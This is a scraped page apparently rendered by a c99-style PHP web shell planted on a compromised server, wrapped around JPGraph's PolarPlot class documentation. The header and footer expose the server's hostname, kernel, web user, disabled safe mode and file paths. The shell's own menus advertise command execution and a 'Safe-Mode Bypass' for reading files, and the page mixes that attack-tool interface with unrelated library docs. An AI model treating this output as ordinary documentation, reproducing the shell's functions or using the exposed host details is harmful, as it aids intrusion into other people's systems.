Software: Apache/2.2.3 (CentOS). PHP/5.1.6 uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44 uid=48(apache) gid=48(apache) groups=48(apache) Safe-mode: OFF (not secure) /var/www/html/manage/jpgraph/docs/ref/ drwxr-xr-x |
Viewing file: PolarPlot.html (10.86 KB) -rw-r--r-- Select action/file-type: (+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) | CLASS PolarPlot
(Defined in: jpgraph_polar.php : 37)
Class usage and Overview Represents a polar plot. A polar plot is a line plot that may have marks or be filled.
Public properties are
See also related classes: PlotMark
Class Methods
Description A polar plot is created form an array of (angle,radius) specification for each plot point.. Example $polarplot = new PolarPlot($pdata); $polarplot->SetFillColor('lightblue@0.5'); $polargraph->Add($polarplot); $polargraph->Stroke();
Description Specify line color for polar plot Example
Description Specify URL targets for markers on the polar plot. If you have specified a mark the polar plot you can add URL targets for each mark with this method.
Remember that to create an image map graph you need to construct the graph with the Graph::StrokeCSIM() method instead of the ordinary Graph::Stroke() See also Graph::StrokeCSIM
Example $t = array('#1','#2','#3','#4','#5','#6'); $polarplot->SetCSIMTargets($t);
Description Specify fill color for plot. If the fill color is specified as '' then no fill will be used. See also PolarPlot::SetColor
Example
Description Specify legend text for the plot. When image maps are used you can also specify a URL for this legend. Example
Description Sepcify line weight for plot Example
|
:: Command execute :: | |
:: Shadow's tricks :D :: | |
Useful Commands
|
:: Preddy's tricks :D :: | |
Php Safe-Mode Bypass (Read Files)
|
--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0182 ]-- |